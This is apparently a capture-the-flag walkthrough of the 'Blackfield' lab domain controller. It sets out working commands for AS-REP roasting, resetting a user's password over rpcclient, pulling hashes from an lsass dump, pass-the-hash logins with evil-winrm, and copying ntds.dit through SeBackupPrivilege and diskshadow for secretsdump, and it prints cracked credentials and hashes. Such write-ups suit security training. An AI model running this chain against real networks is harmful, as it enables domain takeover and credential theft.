e4b91035871b12ac8cd1cd45348d29d4.png

0. Preface

If you didn’t know that you could reset passwords through RPCClient, now you do. I also never had a chance to play with SeBackupPrivilege tokens, so this was a very nice learning opportunity as well.

In this box, we will be tackling:

  1. ASREPRoasting to get valid users and TGTs
  2. Using RPCClient to reset passwords
  3. Reading memory dump of lsass
  4. Abusing SeBackupPrivilege token and dumping NTDS.dit

1. Preliminary NMAP Scan

sudo nmap -sC -sV -oN nmap.txt -p- 10.10.10.192 -v

7cd63ca236f3df14127cffada491d641.png

c739fa0c00b66ace4aab963ae94582a4.png

This is a domain controller with the hostname of DC01, and the domain name of blackfield.local. WinRM is open, so we can likely use that to gain access into the domain controller later on once we have valid credentials.

2. Active Directory Enumeration

Let’s start off with anonymous SMB enumeration.

9102085982249843f854ca81f1941d43.png

Let’s try going into the profiles$ share.

9d66ca42bfa9cdd886364e2144fdf547.png

This gives us a ton of potential usernames. Let’s try to ASREPRoast these usernames.

GetNPUsers.py blackfield.local/ -no-pass -usersfile userlist.txt -dc-ip 10.10.10.192

5ddbc9e5b1699fabb41216d135be0a56.png

Awesome. We got a hit. Out of the whole list, it seems like only support, audit2020 and svc_backup are valid users. Let’s crack the TGT for support using john.

sudo john --wordlist:/usr/share/wordlists/rockyou.txt support.hash
sudo john --show support.hash

b10b66bfa22d417dfeb8d6276972cb63.png

We have our first set of credentials - support:#00^BlackKnight

3. RPCClient Password Reset

Let’s use rpcclient to further enumerate the domain controller using the credentials we got earlier.

rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192

enumalsgroups builtin
queryaliasmem builtin 0x244
lookupsids S-1-5-21-4194615774-2175524697-3563712290-1413

06cb1700cb342781d33fb09228dd5253.png

We find that svc_backup is part of remote management group, which will allow us access into the domain controller if we manage to get the password.

Back tracking a bit, there is a forensic share with the comment forensic/audit share. Quick guess - this is accessible using the audit2020 user.

Let’s see if we can’t reset the password for audit2020 using rpcclient.

rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192

setuserinfo2 audit2020 23 'P@$$w0rd12345'

c613a405d8e113571ea6d221eb430716.png

Awesome, seems to be successful.

4. Extracting NTHashes from LSASS Memory Dump

Let’s see what the audit2020 user can access using smbmap.

smbmap -u 'audit2020' -d 'blackfield.local' -p 'P@$$w0rd12345' -H 10.10.10.192

964dc95b39d3009c343b75744ed052a1.png

We guessed right. Let’s download everything from the forensic share and enumerate it offline.

df1519b8385f8f9ae8db526b9734f993.png

There’s a lot of files in here, so let’s focus on the only one that matters.

There is a folder that contains the memory dumps of some processes.

7c96810edab3f84db8dab222f6e9fe5c.png

What sticks out is lsass.zip, which contains hashes of all logged on users at that point in time.

Let’s extract it.

f759867774f60838036f33c893688e95.png

Now that we have the dump file, let’s use pypykatz to dump the hashes from it.

pypykatz lsa minidump lsass.DMP >> lsass-dump.txt

40ee337413c2fc87dc726dd80cc52308.png

Awesome, we got the hash of svc_backup and administrator.

5385241a9e91cf5e7bc00861f7dd53aa.png

5. Exploiting Backup Privileges

First, let’s try to pass the administrator hash using evil-winrm.

evil-winrm -i 10.10.10.192 -u 'blackfield.local\administrator' -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

775d8ac8d5e909bebc1b194ca80d4506.png

Seems like the password has been changed since the dump. Let’s try svc_backup next.

evil-winrm -i 10.10.10.192 -u 'blackfield.local\svc_backup' -H 9658d1d1dcd9250115e2205d9f48400d

01cbe65ec2ccf491604fc7435ab9264b.png

We’re in. Let’s grab the user flag from the desktop first.

Next, let’s see what rights this user has.

eca6154b8c99889864241ab731c6a056.png

We see that it has both the SeBackupPrivilege and SeRestorePrivilege tokens, which allows us to read, copy and write to any file in the system.

We should be able to exploit these privileges by copying out and extracting the administrator LM/NTHash from ntds.dit, which is the password database for Active Directory servers.

After a fair bit of Googling, we find this Github repository which contains PowerShell cmdlets to allow us to exploit the SeBackupPrivilege token. We also find this Github repository, which walks through how to create a shadow copy backup of the domain controller, since the ntds.dit cannot be copied out normally.

First, let’s create a script.txt file with the following content to prepare to shadow copy “backup” the domain controller.

set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup

To prevent weird encoding issues, use unix2dos script.txt to convert it to dos (windows) format. Now, let’s upload the file to the remote session using evil-winrm.

f6c14a634c331281cfdd9e2d2bf802d9.png

Now, we can run diskshadow /s script.txt to trigger the shadow copy backup, which will be exposed on w:\.

d2e0f81147aff20a5a10c3d31f9d6b92.png

Before we can actually copy out ntds.dit from the shadow copy backup, we will need to make use of the PowerShell cmdlets found in the first Github repository earlier.

We can upload the whole SeBackupPrivilegeCmdlets folder into the server using evil-winrm.

22c2ef1dc14bda4010a186bfa5911bba.png

Next, we can import the modules found in the /bin/debug folder. You can run Get-Module after this to verify that they have been imported successfully.

Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

a8f5ddf38cc13c6286559d4729f10cb3.png

Next, navigate to W:\windows\ntds.

d9cbfcf667e79697520cb9fa9178b3c9.png

Copy the ntds.dit file using Copy-FileSeBackupPrivilege, but ensure that the destination filename is different or it will not work.

Copy-FileSeBackupPrivilege ntds.dit $env:LOCALAPPDATA\microsoft\database

We also need the HKLM\SYSTEM registry hive to dump the ntds.dit file, so let’s grab that too.

reg save HKLM\SYSTEM $env:LOCALAPPDATA\microsoft\sys

Let’s download everything back to our machine.

bd98bdeb004cabbb14355a0c37fba280.png

f2c6683d0f4c239bed8ad2763a69e26f.png

Now, let’s use secretsdump.py to dump ntds.dit.

secretsdump.py -system sys -ntds database LOCAL >> secretsdump.txt

99228ae5aec0fbc56eb93ab24d41a3ae.png

Now we can finally pass the (real) administrator hash and get the root flag.

ba41e182e26278e5d8020088edece4cd.png